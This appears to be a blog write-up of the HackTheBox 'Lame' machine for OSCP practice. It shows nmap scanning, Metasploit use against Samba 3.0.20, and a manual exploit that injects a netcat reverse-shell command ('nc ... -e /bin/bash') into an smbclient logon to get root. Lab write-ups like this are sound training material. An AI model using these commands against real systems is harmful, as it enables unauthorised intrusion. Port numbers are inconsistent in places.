OSCP Prep: Lame HactTheBox

To start with, I first performed an Nmap scan on the host. I prefer aggressive scans for scanning, and below is the result of the scan.

nmap -A 10.10.10.3

From the scan result, it can be observed that ports 21, 22, 139, and 445 are open.

Port 21 - FTP
Port 22 - SSH
Port 139 - samba
Port 445 - samba

Enumeration and Exploitation

FTP port 23

Port 23 is open, so in that case, an anonymous username was used to see if we get anything interesting in that.

Anonymous login was allowed, but I was not able to get any more information with it. Moving further, the service that was running on port 21 was vsftpd 2.3.4. After some more searching, I got an exploit in searchsploit out of them; one was for Python and the other was on Ruby, and the Ruby one was using Metasploit, so I used that one.

With the Metasploit module, we tried to exploit the vsftpd, but again, it was a failed attempt as it was asking for the password for user 331 and I did not have the password for the user.

SMB ports 139 & 445

After that, I searched for any public exploits that were available for Samba with SearchSploit, and it provided one Metasploit module that could be used to exploit that vulnerability.

searchsploit smaba 3.0.20

Post which I have used the Metasploit framework to proceed with the exploitation procedure.

Exploit 0 was used to exploit the machine, and for that, we had to make some changes in setting the RHOSTS, and in my case, the LHOST was not set, so I had to set both.

use 0
show options
set RHOSTS 10.10.10.3
set LHOST 10.10.16.2

By using the command “exploit,” we exploited and got a reverse shell for using root.

After getting access to the root user, we retrieved the user and root flag for the machine.

USER FLAG

ROOT FLAG

Manual Exploit

An alternate method of exploiting Samba is a manual exploit; for that, we have to use SMBclient.

After using smbclient, I was able to see some shares that I may have access to

After that, I tried to see what permissions are there in the tmp share of SMBA with SMBAmap.

smbmap //10.10.10.3/tmp

As can be seen from the image, tmp share has read and written permission onto it. After some research, I got to know that we can exploit it after reading the blog.

https://medium.com/@nmappn/exploiting-smb-samba-without-metasploit-series-1-b34291bbfd63

Post that, I tried to exploit it.

First I created a payload.

logon “/=nc 10.10.16.2 1234 -e /bin/bash"

Then I accessed the tmp folder with the smbclient and used the created payload, but before that, I started a listener on the host.

nc -nvlp 1234

After that, I used the logon command, which provided me with the root access. By that, I managed to get the flag for both the user and root.

smb: \\> logon "/= nc 10.10.16.2 1234 -e /bin/bash"

After executing the command, we get the root access, and we can retrieve the user and root flag.

If you enjoyed this blog and found the information helpful, consider buying me a coffee! Your support helps me keep creating content like this. Just click the button below — thanks for your generosity!

<script type=”text/javascript” src=”https://cdnjs.buymeacoffee.com/1.0.0/button.prod.min.js" data-name=”bmc-button” data-slug=”AmeyMuley” data-color=”#5F7FFF” data-emoji=”” data-font=”Bree” data-text=”Buy me a coffee” data-outline-color=”#000000" data-font-color=”#ffffff” data-coffee-color=”#FFDD00" ></script>